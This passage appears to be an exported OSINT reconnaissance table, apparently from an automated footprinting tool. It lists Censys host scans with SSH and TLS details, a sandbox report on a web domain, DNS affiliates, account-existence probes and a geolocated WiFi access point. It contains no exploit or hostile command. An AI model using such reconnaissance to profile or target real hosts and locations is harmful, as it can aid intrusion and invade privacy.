"server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", 
"vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 02:52:56 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://size.scrollerwidth/e.renderer.layerconfig.characterwidth+6);if(t.meta&&(r-=t.meta.length),t.caption.length', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://makeresults.alacrity.dev/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2444"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_98c_IE_EarlyTabStart_0xa34_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_98c_ConnHashTable<2444>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_98c_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_98c_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "IsoScope_98c_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n 
"{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_98c_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2444"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"makeresults.alacrity.dev"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df63e2b842598037d9.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{47750809-ea4a-11ed-855a-0800272bb261}.dat"\n "iexplore.exe" reads file 
"c:\\windows\\fonts\\staticcache.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df14f61ad00e5e098b.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{4775080b-ea4a-11ed-855a-0800272bb261}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{47750809-ea4a-11ed-855a-0800272bb261}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df63e2b842598037d9.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "2.bddcda81.chunk_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "CabCFAF.tmp" has type "data"- Location: [%TEMP%\\CabCFAF.tmp]- [targetUID: 00000000-00002860]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002444]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF63E2B842598037D9.TMP" has type "data"- Location: [%TEMP%\\~DF63E2B842598037D9.TMP]- [targetUID: 00000000-00002444]\n "~DF14F61AD00E5E098B.TMP" has type "data"- Location: [%TEMP%\\~DF14F61AD00E5E098B.TMP]- 
[targetUID: 00000000-00002444]\n "~DF84D00D0A0D2FCBCA.TMP" has type "data"- Location: [%TEMP%\\~DF84D00D0A0D2FCBCA.TMP]- [targetUID: 00000000-00002444]\n "~DF6B412EB168FE133E.TMP" has type "data"- Location: [%TEMP%\\~DF6B412EB168FE133E.TMP]- [targetUID: 00000000-00002444]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00002444]\n "main.5d62b951.chunk_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "RecoveryStore._47750809-EA4A-11ED-855A-0800272BB261_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_52029E7A-EA4A-11ED-855A-0800272BB261_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_4775080B-EA4A-11ED-855A-0800272BB261_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 256x256 with PNG image data 256 x 256 8-bit gray+alpha non-interlaced 32 bits/pixel"- [targetUID: N/A]\n "9DUANZNV.htm" has type "HTML document ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\9DUANZNV.htm]- [targetUID: 00000000-00002860]\n "6XWCZL0Y.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6XWCZL0Y.txt]- [targetUID: 00000000-00002444]\n "GKERXAWU.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GKERXAWU.txt]- [targetUID: 00000000-00002444]\n "main.2d6f724b.chunk_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "1KFJMIJ5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1KFJMIJ5.txt]- [targetUID: 00000000-00002444]\n 
"77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002860]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "3KD5F91L.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3KD5F91L.txt]- [targetUID: 00000000-00002444]\n "4WS5XBPW.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4WS5XBPW.txt]- [targetUID: 00000000-00002444]\n "V7T3HWNF.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\V7T3HWNF.txt]- [targetUID: 00000000-00002444]\n "Z6E6M77S.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\Z6E6M77S.txt]- [targetUID: 00000000-00002444]\n "CabB5EB.tmp" has type "data"- Location: [%TEMP%\\CabB5EB.tmp]- [targetUID: 00000000-00002860]\n "CabB5D9.tmp" has type "data"- Location: [%TEMP%\\CabB5D9.tmp]- [targetUID: 00000000-00002860]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "urlref_httpsmakeresults.alacrity.dev" has type "HTML document ASCII text with very long lines with no line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://makeresults.alacrity.dev/"\n Pattern match: "https://makeresults.alacrity.dev"\n Pattern match: "www.microsoft.com/pkiops/certs/Microsoft%20Azure%20TLS%20Issuing%20CA%2002%20-%20xsign.crt0-!http://oneocsp.microsoft.com/ocsp05E9R"\n Pattern match: "https://github.com/harsh8398/makeresults/issues/new,onClick:function(){p.a.event"\n Pattern match: 
"SUIDmicrosoft.com/9216234743155231030988123977893431030871MUID0A493A610C7769C3303A29660D3B6871microsoft.com/1025247992076831109342123977893431030871_EDGE_Vmicrosoft.com/9216247992076831109342124009143431030871SRCHDAF=NOFORMmicrosoft.com/1024332378944031085"\n Pattern match: "SUIDmicrosoft.com/9216234743155231030988123977893431030871MUID0A493A610C7769C3303A29660D3B6871microsoft.com/1025247992076831109342123977893431030871SRCHDAF=NOF | 185.199.108.153 |
| 2023-05-12 03:08:46 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.217 | 104.196.30.220 |
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | hmac-sha2-256-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": 
"65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", 
"diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not 
Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": 
"cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": 
false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 03:24:29 | Company Name | No | Company Name Extractor | 0 | 0 | 4 | 0 | None | Netlify\, Inc | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Cytoid (Category: gaming) https://cytoid.io/profile/login | login |
| 2023-05-12 02:57:37 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | (raw Hybrid Analysis sandbox report, not reproduced) | 34.148.97.127 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Mastodon-API (Category: social) https://mastodon.social/api/v2/search?q=Altpapier | Altpapier |
| 2023-05-12 02:55:21 | Physical Location | No | Censys | 0 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, 60306, Germany, Europe | 207.154.228.169 |
| 2023-05-12 03:23:23 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.7:443 | 188.114.96.0/24 |
| 2023-05-12 03:08:53 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.66 | 34.74.170.74 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | WordPress Support (Category: blog) https://wordpress.org/support/users/login/ | login |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | NH-NEW (Net ID: 00:01:21:30:F0:43) | 37.7642, -122.3993 |
| 2023-05-12 02:53:39 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 185.199.108.153 |
| 2023-05-12 02:57:21 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:4a:0e:8c:1b:d3:a5:34:69:b6:32:8e:46:29:d8:95:17:d9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:04 2022 GMT
Not After : Feb 15 09:44:03 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
40:6C:27:E5:F5:7A:53:84:B0:9C:FE:C0:1C:53:80:B3:F8:A3:C2:C8
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
